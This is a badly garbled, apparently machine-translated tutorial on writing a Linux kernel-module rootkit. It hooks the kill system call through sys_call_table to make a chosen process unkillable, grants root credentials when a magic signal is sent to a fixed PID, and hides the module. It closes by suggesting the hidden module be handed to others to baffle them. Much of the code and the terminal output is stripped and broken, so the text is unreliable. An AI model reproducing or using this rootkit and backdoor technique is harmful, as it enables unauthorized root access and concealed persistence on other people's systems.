Teach you how to write LKM rookit! The undead pid & amp; root Backdoor

...... In the previous section, we wrote a basic lkm module. In terms of functionality, it does not have rootkit features. This time we will add some interesting features to it. let's let a specified process not die,

Once, if you want to write a process that no one can die, the process can capture SIGTERM, that is, the default signal sent by kill, which can capture SIGINT. You usually press Ctrl-C to perform this operation, however, you cannot stop it in any way,

SIGKILL, and the ultimate killer.

As a small strong, how can we be so ruined by reality, we have to say no to fate, so there are several solutions, one solution: two processes listen to each other, the other is dead, start a new process immediately. Another solution is as follows:

Who can let kill-9 kill the program? Who is it? Is it an operating system? As all operations are system calls, kill is also a system call... so we can change the system call and ignore users in the kernel mode,

Switching a uid is meaningless.

Not much nonsense, on the code

#include <asm/unistd.h><linux/highmem.h><asm/current.h><linux/sched.h><linux/kernel.h><linux/module.h><linux/init.h><linux/slab.h><linux/list.h><linux/dirent.h><linux/.h><linux/fdtable.h><linux/moduleparam.h> ROOT_PID 7311 ROOT_SIG 7  lpid = ,  *sys_call_table = (unsigned *)  unsigned  cr0 =&  (*kill_ptr)(pid_t pid,  hacked_kill(pid_t pid,      (pid == ROOT_PID && sig == cred *= ( cred *->uid = ->gid = ->suid = ->euid = ->euid = ->egid = ->fsuid = ->fsgid =   (pid == = (*  rootkit_in( module *== (kill_ptr)sys_call_table[__NR_kill];     sys_call_table[__NR_kill] = (unsigned &((self = find_module(&self->&       rootkit_out(== (unsigned  

 

Note that the address 0xc12efee0 varies with everyone. It is recorded in/boot/System. map-'uname-R', which indicates the address of sys_call_table.

Cat/boot/System. map-'uname-R' | grep sys_call

unsigned  *sys_call_table = (unsigned *) ;

The basic usage is

1. Start a process at will. Here we take the deamon background sign-In program as an example./L133, and the record pid is 13165.

liet@kali:~/code/c/study/socket/http/bbs_sign$ ./~/code/c/study/socket/http/bbs_sign$  aux |            ?        S    :   : ./           pts/    S+   :   : ~/code/c/study/socket/http/bbs_sign$ 

2. Load rootkit

liet@kali:~/code/c/study/virus/toykit/toykit_or/test$   test.ko lpid=~/code/c/study/virus/toykit/toykit_or/test$ dmesg | ] warning: `VirtualBox[  ] test: `~/code/c/study/virus/toykit/toykit_or/test$ 

OK, rootkit loaded !!!!

3. rootkit operation

1. No 13165 processes can be killed

liet@kali:~/code/c/study/socket/http/bbs_sign$  - ~/code/c/study/socket/http/bbs_sign$  aux |            ?        S    :   : ./           pts/    S+   :   :  l137

2. root Backdoor

liet@kali:~/code/c/study/socket/http/bbs_sign$ =(liet) gid=(liet) =(liet),(dialout),(~/code/c/study/socket/http/bbs_sign$  - ~/code/c/study/socket/http/bbs_sign$ =(root) gid=(root) =(root),(dialout),(),~/code/c/study/socket/http/bbs_sign$ 

 

After you have completed a process, you can hide the mod and hand it over to others. Let him kill the process and see how to kill it ,........